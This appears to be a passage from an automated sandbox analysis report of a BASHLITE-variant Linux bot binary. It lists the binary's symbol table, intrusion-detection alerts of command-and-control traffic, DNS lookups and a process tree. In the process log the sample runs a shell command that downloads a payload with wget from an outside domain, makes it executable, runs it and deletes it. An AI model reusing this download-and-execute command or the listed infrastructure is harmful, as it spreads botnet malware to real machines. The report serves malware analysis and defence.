            gethostbyname2_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            gethostbyname_r.symtab0x40f67c791FUNC<unknown>DEFAULT2
            gethostbyname_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            gethostname.symtab0x40f9c094FUNC<unknown>DEFAULT2
            gethostname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            getpagesize.symtab0x40b7f819FUNC<unknown>DEFAULT2
            getpagesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            getpid.symtab0x4075a48FUNC<unknown>DEFAULT2
            getpid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            getppid.symtab0x4075088FUNC<unknown>DEFAULT2
            getppid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            getrlimit.symtab0x40b84040FUNC<unknown>DEFAULT2
            getrlimit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            getrlimit64.symtab0x40b84040FUNC<unknown>DEFAULT2
            getsockname.symtab0x4094dc41FUNC<unknown>DEFAULT2
            getsockname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            getsockopt.symtab0x40950850FUNC<unknown>DEFAULT2
            getsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            getuid.symtab0x40b80c8FUNC<unknown>DEFAULT2
            getuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            h_errno.symtab0x51f42c4OBJECT<unknown>DEFAULT10
            hacks.symtab0x518c004OBJECT<unknown>DEFAULT9
            hacks2.symtab0x518c044OBJECT<unknown>DEFAULT9
            hacks3.symtab0x518c084OBJECT<unknown>DEFAULT9
            hacks4.symtab0x518c0c4OBJECT<unknown>DEFAULT9
            hextable.symtab0x410d402048OBJECT<unknown>DEFAULT4
            hoste.5764.symtab0x51f3d032OBJECT<unknown>DEFAULT10
            htonl.symtab0x40942c5FUNC<unknown>DEFAULT2
            htons.symtab0x4094248FUNC<unknown>DEFAULT2
            httphex.symtab0x4035e71096FUNC<unknown>DEFAULT2
            i.5272.symtab0x518d4c4OBJECT<unknown>DEFAULT9
            index.symtab0x408bb0417FUNC<unknown>DEFAULT2
            inet_addr.symtab0x40944029FUNC<unknown>DEFAULT2
            inet_aton.symtab0x40d9d8135FUNC<unknown>DEFAULT2
            inet_aton.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            inet_makeaddr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            inet_ntop.symtab0x40e771518FUNC<unknown>DEFAULT2
            inet_ntop4.symtab0x40e67e243FUNC<unknown>DEFAULT2
            inet_pton.symtab0x40e491493FUNC<unknown>DEFAULT2
            inet_pton4.symtab0x40e40c133FUNC<unknown>DEFAULT2
            initConnection.symtab0x4055a2359FUNC<unknown>DEFAULT2
            init_rand.symtab0x400504126FUNC<unknown>DEFAULT2
            initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            initstate.symtab0x40aa16110FUNC<unknown>DEFAULT2
            initstate_r.symtab0x40ac88185FUNC<unknown>DEFAULT2
            ioctl.symtab0x4077dc101FUNC<unknown>DEFAULT2
            ioctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            isatty.symtab0x40939825FUNC<unknown>DEFAULT2
            isatty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            kill.symtab0x4076bc44FUNC<unknown>DEFAULT2
            kill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            killer_status.symtab0x5191b04OBJECT<unknown>DEFAULT10
            last_id.5826.symtab0x5191202OBJECT<unknown>DEFAULT9
            last_ns_num.5825.symtab0x51f4384OBJECT<unknown>DEFAULT10
            libc/string/x86_64/bzero.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/string/x86_64/memcpy.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/string/x86_64/mempcpy.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/string/x86_64/memset.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/string/x86_64/strchr.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/string/x86_64/strcmp.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/string/x86_64/strcpy.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/string/x86_64/strcspn.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/string/x86_64/strlen.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/string/x86_64/strpbrk.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/string/x86_64/strspn.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/sysdeps/linux/x86_64/crt1.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/sysdeps/linux/x86_64/crti.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/sysdeps/linux/x86_64/crtn.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            libc/sysdeps/linux/x86_64/vfork.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            listFork.symtab0x401c14211FUNC<unknown>DEFAULT2
            llseek.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            lseek.symtab0x40fe9845FUNC<unknown>DEFAULT2
            lseek.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            lseek64.symtab0x40fa705FUNC<unknown>DEFAULT2
            macAddress.symtab0x5191b46OBJECT<unknown>DEFAULT10
            main.symtab0x4058f21624FUNC<unknown>DEFAULT2
            main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            makeIPPacket.symtab0x401e33153FUNC<unknown>DEFAULT2
            makeRandomStr.symtab0x401722110FUNC<unknown>DEFAULT2
            makevsepacket.symtab0x402e3c169FUNC<unknown>DEFAULT2
            malloc.symtab0x40979e2187FUNC<unknown>DEFAULT2
            malloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            malloc_trim.symtab0x40a88428FUNC<unknown>DEFAULT2
            memchr.symtab0x40d2dc236FUNC<unknown>DEFAULT2
            memchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            memcpy.symtab0x408f50102FUNC<unknown>DEFAULT2
            memmove.symtab0x40d3c8702FUNC<unknown>DEFAULT2
            memmove.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            mempcpy.symtab0x40d28090FUNC<unknown>DEFAULT2
            memrchr.symtab0x40d7a8233FUNC<unknown>DEFAULT2
            memrchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            memset.symtab0x408ad0210FUNC<unknown>DEFAULT2
            mmap.symtab0x40b6f448FUNC<unknown>DEFAULT2
            mmap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            mremap.symtab0x40b91442FUNC<unknown>DEFAULT2
            mremap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            munmap.symtab0x40b8c438FUNC<unknown>DEFAULT2
            munmap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            mylock.symtab0x518fd040OBJECT<unknown>DEFAULT9
            mylock.symtab0x51900040OBJECT<unknown>DEFAULT9
            nanosleep.symtab0x40b8ec38FUNC<unknown>DEFAULT2
            nanosleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            next_start.1699.symtab0x51f2008OBJECT<unknown>DEFAULT10
            ngPid.symtab0x51f4744OBJECT<unknown>DEFAULT10
            nprocessors_onln.symtab0x40afa4223FUNC<unknown>DEFAULT2
            ntohl.symtab0x4094395FUNC<unknown>DEFAULT2
            ntohl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            ntohs.symtab0x4094318FUNC<unknown>DEFAULT2
            ntop.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            numpids.symtab0x5191a88OBJECT<unknown>DEFAULT10
            object.5162.symtab0x51916048OBJECT<unknown>DEFAULT10
            open.symtab0x407510106FUNC<unknown>DEFAULT2
            open.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            opendir.symtab0x40ba71157FUNC<unknown>DEFAULT2
            opendir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            opennameservers.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            ourIP.symtab0x51f4704OBJECT<unknown>DEFAULT10
            p.5148.symtab0x518be80OBJECT<unknown>DEFAULT9
            parseHex.symtab0x40152585FUNC<unknown>DEFAULT2
            parse_config.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            pids.symtab0x51f4808OBJECT<unknown>DEFAULT10
            pipe.symtab0x40757c38FUNC<unknown>DEFAULT2
            pipe.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            poll.symtab0x40f99441FUNC<unknown>DEFAULT2
            poll.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            prctl.symtab0x4075b444FUNC<unknown>DEFAULT2
            prctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            prefix.5134.symtab0x4138a812OBJECT<unknown>DEFAULT4
            print.symtab0x400a321083FUNC<unknown>DEFAULT2
            printchar.symtab0x4007bf75FUNC<unknown>DEFAULT2
            printi.symtab0x4008f1321FUNC<unknown>DEFAULT2
            prints.symtab0x40080a231FUNC<unknown>DEFAULT2
            processCmd.symtab0x403a2f7027FUNC<unknown>DEFAULT2
            program_invocation_name.symtab0x5191188OBJECT<unknown>DEFAULT9
            program_invocation_short_name.symtab0x5191108OBJECT<unknown>DEFAULT9
            qual_chars.5141.symtab0x4138c020OBJECT<unknown>DEFAULT4
            raise.symtab0x40dd5c18FUNC<unknown>DEFAULT2
            raise.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            rand.symtab0x40a96811FUNC<unknown>DEFAULT2
            rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            rand__str.symtab0x406012135FUNC<unknown>DEFAULT2
            rand_alpha_str.symtab0x406099118FUNC<unknown>DEFAULT2
            rand_alphastr.symtab0x400710175FUNC<unknown>DEFAULT2
            rand_cmwc.symtab0x40065a182FUNC<unknown>DEFAULT2
            rand_init.symtab0x405f4c83FUNC<unknown>DEFAULT2
            rand_next.symtab0x405f9f115FUNC<unknown>DEFAULT2
            random.symtab0x40a97472FUNC<unknown>DEFAULT2
            random.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            random_poly_info.symtab0x4144d040OBJECT<unknown>DEFAULT4
            random_r.symtab0x40ab7790FUNC<unknown>DEFAULT2
            random_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            randtbl.symtab0x519060128OBJECT<unknown>DEFAULT9
            rawmemchr.symtab0x40d6e8189FUNC<unknown>DEFAULT2
            rawmemchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            read.symtab0x40767039FUNC<unknown>DEFAULT2
            read.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            read_etc_hosts_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            readdir64.symtab0x40bb84143FUNC<unknown>DEFAULT2
            readdir64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            realloc.symtab0x40a124878FUNC<unknown>DEFAULT2
            realloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            recv.symtab0x40953c11FUNC<unknown>DEFAULT2
            recv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            recvLine.symtab0x401790574FUNC<unknown>DEFAULT2
            recvfrom.symtab0x40954845FUNC<unknown>DEFAULT2
            recvfrom.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            resolv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            resolv_conf_mtime.5807.symtab0x51f4684OBJECT<unknown>DEFAULT10
            resolv_domain_to_hostname.symtab0x406110156FUNC<unknown>DEFAULT2
            resolv_entries_free.symtab0x40680c56FUNC<unknown>DEFAULT2
            resolv_lookup.symtab0x4062541464FUNC<unknown>DEFAULT2
            resolv_skip_name.symtab0x4061ac168FUNC<unknown>DEFAULT2
            rindex.symtab0x40d89453FUNC<unknown>DEFAULT2
            rtcp.symtab0x4028a1939FUNC<unknown>DEFAULT2
            sbrk.symtab0x40b87074FUNC<unknown>DEFAULT2
            sbrk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            scanPid.symtab0x51f4784OBJECT<unknown>DEFAULT10
            select.symtab0x40764444FUNC<unknown>DEFAULT2
            select.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            send.symtab0x40957811FUNC<unknown>DEFAULT2
            send.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            sendSTD.symtab0x402c4c496FUNC<unknown>DEFAULT2
            sendto.symtab0x40958448FUNC<unknown>DEFAULT2
            sendto.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            setsockopt.symtab0x4095b453FUNC<unknown>DEFAULT2
            setsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            setstate.symtab0x40a9bc90FUNC<unknown>DEFAULT2
            setstate_r.symtab0x40aacc171FUNC<unknown>DEFAULT2
            sigaction.symtab0x40b72d114FUNC<unknown>DEFAULT2
            sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            sigaddset.symtab0x40961c35FUNC<unknown>DEFAULT2
            sigaddset.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            sigempty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            sigemptyset.symtab0x40964010FUNC<unknown>DEFAULT2
            signal.symtab0x40964c133FUNC<unknown>DEFAULT2
            signal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            sigprocmask.symtab0x40787047FUNC<unknown>DEFAULT2
            sigprocmask.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            sigsetops.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            skip_and_NUL_space.symtab0x40f1e544FUNC<unknown>DEFAULT2
            skip_nospace.symtab0x40f1bc41FUNC<unknown>DEFAULT2
            sleep.symtab0x40af14142FUNC<unknown>DEFAULT2
            sleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            socket.symtab0x4095ec47FUNC<unknown>DEFAULT2
            socket.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            socket_connect.symtab0x40350f216FUNC<unknown>DEFAULT2
            sockprintf.symtab0x401035365FUNC<unknown>DEFAULT2
            spec_and_mask.5140.symtab0x4138e016OBJECT<unknown>DEFAULT4
            spec_base.5133.symtab0x4138b47OBJECT<unknown>DEFAULT4
            spec_chars.5137.symtab0x41394021OBJECT<unknown>DEFAULT4
            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
            2025-05-10T07:44:16.485852+0200 | 2839490 | ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) | 1 | 192.168.2.15 | 58154 | 92.60.77.69 | 666 | TCP
            2025-05-10T07:44:16.758698+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.15 | 58154 | TCP
            2025-05-10T07:44:32.037794+0200 | 2839490 | ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) | 1 | 192.168.2.15 | 58156 | 92.60.77.69 | 666 | TCP
            2025-05-10T07:44:32.310593+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.15 | 58156 | TCP
            2025-05-10T07:44:47.594854+0200 | 2839490 | ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) | 1 | 192.168.2.15 | 58158 | 92.60.77.69 | 666 | TCP
            2025-05-10T07:44:47.867827+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.15 | 58158 | TCP
            2025-05-10T07:45:03.154401+0200 | 2839490 | ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) | 1 | 192.168.2.15 | 58160 | 92.60.77.69 | 666 | TCP
            2025-05-10T07:45:03.427653+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.15 | 58160 | TCP
            2025-05-10T07:45:18.714205+0200 | 2839490 | ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) | 1 | 192.168.2.15 | 58162 | 92.60.77.69 | 666 | TCP
            2025-05-10T07:45:18.988148+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.15 | 58162 | TCP
            2025-05-10T07:45:34.274220+0200 | 2839490 | ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) | 1 | 192.168.2.15 | 58164 | 92.60.77.69 | 666 | TCP
            2025-05-10T07:45:34.547050+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.15 | 58164 | TCP
            2025-05-10T07:45:49.835535+0200 | 2839490 | ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) | 1 | 192.168.2.15 | 58166 | 92.60.77.69 | 666 | TCP
            2025-05-10T07:45:50.109342+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.15 | 58166 | TCP
            2025-05-10T07:46:05.397910+0200 | 2839490 | ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) | 1 | 192.168.2.15 | 58168 | 92.60.77.69 | 666 | TCP
            2025-05-10T07:46:05.672211+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.15 | 58168 | TCP
            2025-05-10T07:46:20.958201+0200 | 2839490 | ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) | 1 | 192.168.2.15 | 58170 | 92.60.77.69 | 666 | TCP
            2025-05-10T07:46:21.231592+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.15 | 58170 | TCP
            2025-05-10T07:46:36.516331+0200 | 2839490 | ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) | 1 | 192.168.2.15 | 58172 | 92.60.77.69 | 666 | TCP
            2025-05-10T07:46:36.789043+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.15 | 58172 | TCP
            2025-05-10T07:46:52.076642+0200 | 2839490 | ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) | 1 | 192.168.2.15 | 58174 | 92.60.77.69 | 666 | TCP
            2025-05-10T07:46:52.349507+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.15 | 58174 | TCP
            2025-05-10T07:47:07.632380+0200 | 2839490 | ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) | 1 | 192.168.2.15 | 58176 | 92.60.77.69 | 666 | TCP
            2025-05-10T07:47:07.905258+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.15 | 58176 | TCP
            2025-05-10T07:47:23.188326+0200 | 2839490 | ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) | 1 | 192.168.2.15 | 58178 | 92.60.77.69 | 666 | TCP
            2025-05-10T07:47:23.461040+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.15 | 58178 | TCP
            2025-05-10T07:47:38.744584+0200 | 2839490 | ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) | 1 | 192.168.2.15 | 58180 | 92.60.77.69 | 666 | TCP
            2025-05-10T07:47:39.017777+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.15 | 58180 | TCP
            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
            May 10, 2025 07:44:16.274662971 CEST | 192.168.2.15 | 1.1.1.1 | 0xd316 | Standard query (0) | gay.energy | A (IP address) | IN (0x0001) | false
            May 10, 2025 07:44:16.274662971 CEST | 192.168.2.15 | 1.1.1.1 | 0xd33d | Standard query (0) | gay.energy | 28 | IN (0x0001) | false
            May 10, 2025 07:44:16.428023100 CEST | 192.168.2.15 | 1.1.1.1 | 0xd33d | Standard query (0) | gay.energy | 28 | IN (0x0001) | false
            May 10, 2025 07:44:16.439112902 CEST | 192.168.2.15 | 1.1.1.1 | 0xd316 | Standard query (0) | gay.energy | A (IP address) | IN (0x0001) | false
            May 10, 2025 07:46:58.477360964 CEST | 192.168.2.15 | 1.1.1.1 | 0x9c84 | Standard query (0) | daisy.ubuntu.com | A (IP address) | IN (0x0001) | false
            May 10, 2025 07:46:58.477360964 CEST | 192.168.2.15 | 1.1.1.1 | 0xf884 | Standard query (0) | daisy.ubuntu.com | 28 | IN (0x0001) | false

            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
            May 10, 2025 07:44:16.427459955 CEST | 1.1.1.1 | 192.168.2.15 | 0xd33d | Name error (3) | gay.energy | none | none | 28 | IN (0x0001) | false
            May 10, 2025 07:44:16.438735962 CEST | 1.1.1.1 | 192.168.2.15 | 0xd316 | Name error (3) | gay.energy | none | none | A (IP address) | IN (0x0001) | false
            May 10, 2025 07:44:16.569334984 CEST | 1.1.1.1 | 192.168.2.15 | 0xd33d | Name error (3) | gay.energy | none | none | 28 | IN (0x0001) | false
            May 10, 2025 07:44:16.580815077 CEST | 1.1.1.1 | 192.168.2.15 | 0xd316 | Name error (3) | gay.energy | none | none | A (IP address) | IN (0x0001) | false
            May 10, 2025 07:46:58.652348995 CEST | 1.1.1.1 | 192.168.2.15 | 0x9c84 | No error (0) | daisy.ubuntu.com | | 162.213.35.25 | A (IP address) | IN (0x0001) | false
            May 10, 2025 07:46:58.652348995 CEST | 1.1.1.1 | 192.168.2.15 | 0x9c84 | No error (0) | daisy.ubuntu.com | | 162.213.35.24 | A (IP address) | IN (0x0001) | false

            System Behavior

            Start time (UTC):05:44:14
            Start date (UTC):10/05/2025
            Path:/tmp/x86.elf
            Arguments:/tmp/x86.elf
            File size:136901 bytes
            MD5 hash:b1a9dfc6e42c89e400efad9451540b1e

            Start time (UTC):05:44:14
            Start date (UTC):10/05/2025
            Path:/tmp/x86.elf
            Arguments:-
            File size:136901 bytes
            MD5 hash:b1a9dfc6e42c89e400efad9451540b1e

            Start time (UTC):05:44:14
            Start date (UTC):10/05/2025
            Path:/bin/sh
            Arguments:/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Start time (UTC):05:44:14
            Start date (UTC):10/05/2025
            Path:/bin/sh
            Arguments:-
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Start time (UTC):05:44:14
            Start date (UTC):10/05/2025
            Path:/usr/bin/wget
            Arguments:wget -q http://gay.energy/.../vivid -O .....
            File size:548568 bytes
            MD5 hash:996940118df7bb2aaa718589d4e95c08

            Start time (UTC):05:44:15
            Start date (UTC):10/05/2025
            Path:/bin/sh
            Arguments:-
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Start time (UTC):05:44:15
            Start date (UTC):10/05/2025
            Path:/usr/bin/chmod
            Arguments:chmod 777 .....
            File size:63864 bytes
            MD5 hash:739483b900c045ae1374d6f53a86a279

            Start time (UTC):05:44:15
            Start date (UTC):10/05/2025
            Path:/bin/sh
            Arguments:-
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Start time (UTC):05:44:15
            Start date (UTC):10/05/2025
            Path:/bin/sh
            Arguments:/bin/sh ./.....
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Start time (UTC):05:44:15
            Start date (UTC):10/05/2025
            Path:/bin/sh
            Arguments:-
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Start time (UTC):05:44:15
            Start date (UTC):10/05/2025
            Path:/usr/bin/rm
            Arguments:rm -rf .....
            File size:72056 bytes
            MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

            Start time (UTC):05:44:14
            Start date (UTC):10/05/2025
            Path:/tmp/x86.elf
            Arguments:-
            File size:136901 bytes
            MD5 hash:b1a9dfc6e42c89e400efad9451540b1e

            Start time (UTC):05:44:14
            Start date (UTC):10/05/2025
            Path:/tmp/x86.elf
            Arguments:-
            File size:136901 bytes
            MD5 hash:b1a9dfc6e42c89e400efad9451540b1e

            Start time (UTC):05:44:14
            Start date (UTC):10/05/2025
            Path:/tmp/x86.elf
            Arguments:-
            File size:136901 bytes
            MD5 hash:b1a9dfc6e42c89e400efad9451540b1e